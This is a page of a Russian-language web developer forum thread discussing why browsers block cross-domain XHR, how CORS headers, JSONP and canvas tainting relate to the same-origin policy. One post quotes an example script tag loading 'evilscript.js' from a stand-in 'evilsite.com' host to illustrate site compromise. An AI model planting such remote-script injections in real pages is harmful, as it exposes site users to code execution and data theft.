Философские вопросы по JS / HTML, JavaScript, VBScript, CSS

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Философские вопросы по JS

15 сообщений из 115, страница 5 из 5

все

Философские вопросы по JS

#37851911

зы

Участник

Сообщения: 3 646

Рейтинг: 0 / 0

он наверное о функции cluster.fork()

...

Рейтинг:

0 / 0

24.06.2012, 01:06

| Ответить | Цитировать | Написать

Период между сообщениями больше года.

Философские вопросы по JS

#38508320

Яростный Меч

Участник

Откуда: здесь была правда.<br /><br />Слоган: Делфи жив!!!

Сообщения: 30 377

Рейтинг: 0 / 0

задумался тут над неким вопросом и понял, что не совсем понимаю суть ^тм

почему XHR не кроссдоменный?

вчера спрашивал на неком другом форуме, и дабы не дублировать буквы и словеса, приведу ссылку на там:
http://javascript.ru/forum/offtopic/43765-xhr-i-krossdomennost.html - более подробная формулировка вопроса.

...

Рейтинг:

0 / 0

20.12.2013, 18:04

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508335

Малыхин Сергей

Участник

Откуда: г. Курск

Сообщения: 745

Рейтинг: 0 / 0

Можно подсунуть скрипт с левого домена который будет исполнятся как родной и как следствие можно (грабить караваны)
получить логины пароли и любые данные с ресурса.

...

Рейтинг:

0 / 0

20.12.2013, 18:18

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508345

Яростный Меч

Участник

Откуда: здесь была правда.<br /><br />Слоган: Делфи жив!!!

Сообщения: 30 377

Рейтинг: 0 / 0

Малыхин СергейМожно подсунуть скрипт с левого домена который будет исполнятся как родной и как следствие можно (грабить караваны)
получить логины пароли и любые данные с ресурса.не совсем понял мысль, опиши чуть подробнее

...

Рейтинг:

0 / 0

20.12.2013, 18:25

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508414

Малыхин Сергей

Участник

Откуда: г. Курск

Сообщения: 745

Рейтинг: 0 / 0

По сути это пассивная попытка защитить данные передаваемые между определенным доменом и пользователем от вмешательства третьей стороны т.е. если каким либо образом на странице(в скрипте) появится XHR на сторонний домен то он не будет работать
как следствие это усложняет межсайтовые скриптинг

И возникает философский вопрос что лучше пассивная защита или упрощенный межсайтовый скриптинг =)

...

Рейтинг:

0 / 0

20.12.2013, 19:33

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508426

Яростный Меч

Участник

Откуда: здесь была правда.<br /><br />Слоган: Делфи жив!!!

Сообщения: 30 377

Рейтинг: 0 / 0

Малыхин Сергей,

типа "не берите данные с другого домена, они могут быть опасны"?
но ведь всегда можно забрать их через свой сервер, на крайняк jsonp

...

Рейтинг:

0 / 0

20.12.2013, 19:43

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508440

Малыхин Сергей

Участник

Откуда: г. Курск

Сообщения: 745

Рейтинг: 0 / 0

именно.

Аналогия .. это просто закрытая дверь открывать ее или нет решать нужно самому

...

Рейтинг:

0 / 0

20.12.2013, 20:01

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508443

Яростный Меч

Участник

Откуда: здесь была правда.<br /><br />Слоган: Делфи жив!!!

Сообщения: 30 377

Рейтинг: 0 / 0

Малыхин Сергейименно.

Аналогия .. это просто закрытая дверь открывать ее или нет решать нужно самомубольше напоминает одинокую дверь, стоящую на дороге - можно обойти справа и слева, но открыть никак.

...

Рейтинг:

0 / 0

20.12.2013, 20:10

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508448

Малыхин Сергей

Участник

Откуда: г. Курск

Сообщения: 745

Рейтинг: 0 / 0

самому можно обходить как угодно )) но эта такая дверь которая ведет в мир другого домена и открывается она только с этой стороны

...

Рейтинг:

0 / 0

20.12.2013, 20:13

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508459

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

Малыхин СергейПо сути это пассивная попытка защитить данные передаваемые между определенным доменом и пользователем от вмешательства третьей стороны т.е. если каким либо образом на странице(в скрипте) появится XHR на сторонний домен то он не будет работатьКак-то притянуто за уши.
В случае вмешательства третьей стороны, что ей не позволит внедрить код типа <script src=" http://evilsite.com/evilscript.js"></script>, что, собственно, и делается, когда ломают сайты? Этот скрипт выполнится как миленький.

Яростный Меч почему XHR не кроссдоменный? Тоже не вижу смысла в запрете кроссдоменности. В dom вижу, в xhr нет. Даже если xhr скачает evilscript.js, это же просто текст. В отличии от <script> он не исполнится по факту загрузки, если не написать специально код для его исполнения.

...

Рейтинг:

0 / 0

20.12.2013, 20:24

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508468

Яростный Меч

Участник

Откуда: здесь была правда.<br /><br />Слоган: Делфи жив!!!

Сообщения: 30 377

Рейтинг: 0 / 0

вообще, картина нагляднее видна в xhr2:
1) для получения данных с другого домена чужой сервер должен выставить заголовок ответа " Access-Control-Allow-Origin ". но это если запрос без куков (дефолтное поведение xhr2)
2) а для запроса с куками должен ещё быть заголовок " Access-Control-Allow-Credentials "

и непонятно ограничение п.1 - его легко обойти серверным запросом, в отличии от п.2, который обойти невозможно в принципе.

...

Рейтинг:

0 / 0

20.12.2013, 20:42

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508474

Малыхин Сергей

Участник

Откуда: г. Курск

Сообщения: 745

Рейтинг: 0 / 0

Это пассивная защита
Нужна она или нет это вопрос отдельный

Третья сторона может и сам сервер взломать и делать вообще что угодно и еще очень много чего может
к сожалению мудаков полно и такие запреты возникают не на пустом месте =(

кстати CORS позволяет легко включить кросдоменные запросы в браузерах

...

Рейтинг:

0 / 0

20.12.2013, 20:50

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508480

Малыхин Сергей

Участник

Откуда: г. Курск

Сообщения: 745

Рейтинг: 0 / 0

Яростный Мечвообще, картина нагляднее видна в xhr2:
1) для получения данных с другого домена чужой сервер должен выставить заголовок ответа " Access-Control-Allow-Origin ". но это если запрос без куков (дефолтное поведение xhr2)
2) а для запроса с куками должен ещё быть заголовок " Access-Control-Allow-Credentials "

и непонятно ограничение п.1 - его легко обойти серверным запросом, в отличии от п.2, который обойти невозможно в принципе.
Наверно стороннему домену могут быть нужны куки с основного домена для обработки запроса а могут быть не нужны
это способ указать нужны или нет куки при запросе стороннему серверу

...

Рейтинг:

0 / 0

20.12.2013, 20:57

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508483

Яростный Меч

Участник

Откуда: здесь была правда.<br /><br />Слоган: Делфи жив!!!

Сообщения: 30 377

Рейтинг: 0 / 0

не так давно узнал, что кроссдоменные ограничения есть для картинок, но там в принципе все понятно.
а именно:
на своей странице можно добавить "чужую" картинку (тег "<img>") - запрос будет с куками.
эту картинку можно скопировать на канву.
после чего канва становится ущербной - у нее нельзя сделать toDataURL или getImageData.
более того, это заразно: если эту канву скопировать на другую, та другая тоже не сериализуется :)

...

Рейтинг:

0 / 0

20.12.2013, 21:00

| Ответить | Цитировать | Написать

Философские вопросы по JS

#38508529

private

Участник

Сообщения: 1 707

Рейтинг: 0 / 0

Кстати xhr2 интересная штука - он посылает запрос на сервер - и сервер принимает его без спец-хедеров - но вот получить ответ от сервера на клиенте можно только выставив эти шедеры.

...

Рейтинг:

0 / 0

20.12.2013, 22:38

| Ответить | Цитировать | Написать

15 сообщений из 115, страница 5 из 5

все

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Философские вопросы по JS

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&msg=38508474&tid=1447529]:	0ms
get settings:	7ms
get forum list:	14ms
check forum access:	2ms
check topic access:	2ms
track hit:	146ms
get topic data:	6ms
get forum data:	2ms
get page messages:	29ms
get tp. blocked users:	1ms
others:	220ms

total:	429ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы